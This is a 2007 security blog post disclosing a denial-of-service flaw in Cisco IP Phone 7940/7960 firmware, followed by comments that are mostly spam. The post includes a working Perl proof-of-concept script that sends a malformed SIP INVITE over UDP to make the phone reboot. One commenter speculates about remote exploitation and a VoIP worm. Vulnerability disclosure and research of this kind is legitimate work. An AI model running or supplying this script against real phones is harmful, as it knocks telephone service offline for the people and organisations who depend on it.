Wednesday, March 21, 2007

Cisco IP Phone 7940/7960 vulnerable to DoS

Ok, this is bad. Cisco IP Phone 7940/7960 is vulnerable to DoS. After sending a malfored crafted SIP INVITE message, you can cause the IP Phone to reboot. This is due to the phone lacking the function to check the validity of the sipURI field of the remote party. This will affect Cisco IP phone 7940/7960 running firmware P0S3-07-4-00.

Unaffected firmware: POS8-6-0



Ok, so i am not vulnerable. :)

Proof of Concept:

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 " unless ($ARGV[2]);

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>'udp',

PeerAddr=>$ARGV[0]);

$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;branch=z9hG4jk\r\nFrom: sip:chirimolla
\@192.168.1.2;tag=qwzng\r\nTo: \r
\nCall-ID: fosforito\@192.168.1.1\r\nCSeq: 921 INVITE\r
\nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n";

$socket->send($msg);

#end

13 comments:

Anonymous said...

Seems that you have an error in your code. "192.168.\xd1.7" will print character 0x1d, and I don't think you want a SYN (sinc idle) in there.

Also, I don't know if there's a way to build a scanner to find out, remotely, which firmware is running.

A bit more research might actually reveal this being remotely exploitable.

Those two combined, and I smell a potential Voip worm (vorm?) coming up.. :D

-m1ke

Anonymous said...

thanks mike.

hackathology

Anonymous said...

Fantastic!!
Well done for your thoughts on the piece of writing Blogger:
Taking Network Security to the Streets.
They are really extremely effective... I really enjoyed checking out your
write up.

Also visit my web blog How to Golf
Also see my page - How to Golf

Anonymous said...

Awesome.
Many thanks for your data on the write up Blogger: Taking Network Security to the Streets.

They would be very useful. I enjoyed checking your page..

Feel free to visit my web site; get rid of nail fungus how to get rid of toenail fungus

Anonymous said...

Particularly well-researched post on Blogger: Taking Network Security to the Streets.
..
Keep publishing.

Feel free to surf to my web page; Desktop Gadgets

Anonymous said...

Great post however I was wondering if you could write a little
more on this subject? I'd be very grateful if you could elaborate a little bit further. Thanks!

Look at my blog post :: Shooting Games

Anonymous said...

Outstanding post however, I was wondering if you could
write a little more on this subject? I'd be very thankful if you could elaborate a little bit further. Many thanks!

Feel free to visit my webpage - top 100 apps

Anonymous said...

Hi there,
I'm at work browsing your blog from my apple iphone! Just wanted to say I love reading through your blog and look forward to all your posts!

Here is my web-site Beginners Golf Putting

Anonymous said...

Good day,
Do you use Twitter? I'd like to follow you but couldn't find the
button!

Feel free to visit my webpage; vehicle app

Anonymous said...

Hmm.. it seems like your site deleted my first comment (it was extremely long)
so I will just summarize what I wrote and say, I'm thoroughly enjoying your blog. I am also an aspiring blogger but I am still new to the whole thing. Do you have any suggestions for beginner blog writers? I'd genuinely appreciate it.


Also visit my webpage: iPod golf
my web page: Golf App

Anonymous said...

The dedicated team of AVG professionals is accessible here all round the hands
of time, whom it is possible to reach by calling around the AVG tech support number.

She invites you to visit her site where she's going to share a proven approach to
start an web business. Donnie Jonston may be the author of this
informative article about how to make funds on Ebay Donnie has numerous years of work experience as a writer plus working with
drop shippers in a very variety of entrepreneurial ventures.


My blog ... www.zqsz.cnwww.zqsz.cn

Anonymous said...

Fantastic website. A lot of useful info here. I am sending it to
several pals ans also sharing in delicious. And of course, thank you for your effort!



Feel free to surf to my website: orthodontic practice Amsterdam south

Anonymous said...

Hi there i am kavin, its my first occasion to commenting anywhere, when i read this article i thought i could also create comment due to this good article.


Here is my page hypnose ericksonienne,